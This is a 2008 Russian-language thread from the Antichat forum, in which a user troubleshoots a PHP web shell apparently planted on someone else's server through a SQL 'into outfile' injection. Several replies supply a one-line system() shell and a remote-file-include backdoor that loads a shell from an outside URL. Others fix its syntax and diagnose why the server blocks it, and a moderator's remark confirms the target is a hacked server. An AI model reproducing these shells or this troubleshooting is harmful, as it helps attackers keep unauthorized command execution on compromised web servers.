ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу проблема с шеллом !
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

проблема с шеллом !
  #1  
Старый 07.05.2008, 03:15
Аватар для stigmatus
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
Провел на форуме:
53043

Репутация: 0
Question проблема с шеллом !
загрузил шелл через " into outfile " простои типа :
PHP код:
 <? system($_GET['c']); ?>
но при виполнения любои команды типа "ls" ничего не случяется и результат никакои ! help !!
 
Ответить с цитированием

  #2  
Старый 07.05.2008, 04:21
Аватар для fly
fly
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме:
967842

Репутация: 251


Отправить сообщение для fly с помощью ICQ
По умолчанию
Сейф мод ON>?
WinOs>?
include заюзать>?
Последний раз редактировалось fly; 07.05.2008 в 04:26..
 
Ответить с цитированием

  #3  
Старый 07.05.2008, 13:02
Аватар для stigmatus
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
Провел на форуме:
53043

Репутация: 0
Question
Цитата:
Сообщение от fly  
Сейф мод ON>?
WinOs>?
include заюзать>?

подскажи как ??? проверить Сейф мод ??
include заюзать ???
 
Ответить с цитированием

  #4  
Старый 07.05.2008, 14:05
Аватар для zythar
zythar
Moderator - Level 7
Регистрация: 16.02.2008
Сообщений: 580
Провел на форуме:
1595333

Репутация: 291


Отправить сообщение для zythar с помощью ICQ
По умолчанию
пиши в РНР файле
PHP код:
if (isset($_GET['shell'])) {
include($_GET['shell'];

потом юзай так:
Код:
http://site/script.php?shell=http://server/shell.txt
юзай php.net
 
Ответить с цитированием

  #5  
Старый 07.05.2008, 14:15
Аватар для Ali_MiX
Ali_MiX
Постоянный
Регистрация: 08.10.2006
Сообщений: 445
Провел на форуме:
1028732

Репутация: 80
Отправить сообщение для Ali_MiX с помощью ICQ Отправить сообщение для Ali_MiX с помощью Yahoo
По умолчанию
а если так require_once(ROOT_DIR.'/shell.php');
 
Ответить с цитированием

  #6  
Старый 07.05.2008, 14:59
Аватар для stigmatus
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
Провел на форуме:
53043

Репутация: 0
По умолчанию
ставид вот ето :
Цитата:
<? if (isset($_GET['shell'])) { include($_GET['shell']; } ?>
получил ето :

Цитата:
Parse error: syntax error, unexpected ';' in /usr/local/apache2/htdocs/cache/information.php on line 1
 
Ответить с цитированием

  #7  
Старый 07.05.2008, 15:33
Аватар для Don1=2
Don1=2
Участник форума
Регистрация: 10.09.2007
Сообщений: 131
Провел на форуме:
829460

Репутация: 170
По умолчанию
Цитата:
Сообщение от stigmatus  
ставид вот ето :

получил ето :
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
скобочку забыл ... учи пхп
 
Ответить с цитированием

  #8  
Старый 07.05.2008, 15:33
Аватар для zythar
zythar
Moderator - Level 7
Регистрация: 16.02.2008
Сообщений: 580
Провел на форуме:
1595333

Репутация: 291


Отправить сообщение для zythar с помощью ICQ
По умолчанию
у тя скобки не хватает.
Код:
<? if (isset($_GET['shell'])) { include($_GET['shell']); } ?>
Цитата:
а если так require_once(ROOT_DIR.'/shell.php');
это если шелл на серваке который ты взломал уже.
 
Ответить с цитированием

  #9  
Старый 07.05.2008, 18:21
Аватар для stigmatus
stigmatus
Новичок
Регистрация: 26.04.2008
Сообщений: 23
Провел на форуме:
53043

Репутация: 0
По умолчанию
Цитата:
Warning: include() [function.include]: URL file-access is disabled in the server configuration in /usr/local/apache2/htdocs/cache/process.php on line 1
чё делоть ??? ищё может чтото ?
 
Ответить с цитированием

  #10  
Старый 07.05.2008, 18:35
Аватар для _Pantera_
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию
Цитата:
Сообщение от stigmatus  
загрузил шелл через " into outfile " простои типа :
PHP код:
 <? system($_GET['c']); ?>
но при виполнения любои команды типа "ls" ничего не случяется и результат никакои ! help !!
Ты уверен что он залился???? куда заливал - в /tmp или ты узнал путь от корня и нашел папку с правами на запись? Я склоняюсь к ответу что он просто не залился......
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема с подключением curl к денверу Zircool PHP, PERL, MySQL, JavaScript 4 13.04.2008 20:01
Проблема с Шеллом it's my Уязвимости 8 07.12.2007 16:09
Проблема с установкой proxy Utochka Уязвимости 3 09.05.2006 01:03
ВАЖНАЯ ПРОБЛЕМА!!! Sn_key Уязвимости 13 08.06.2005 15:50



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ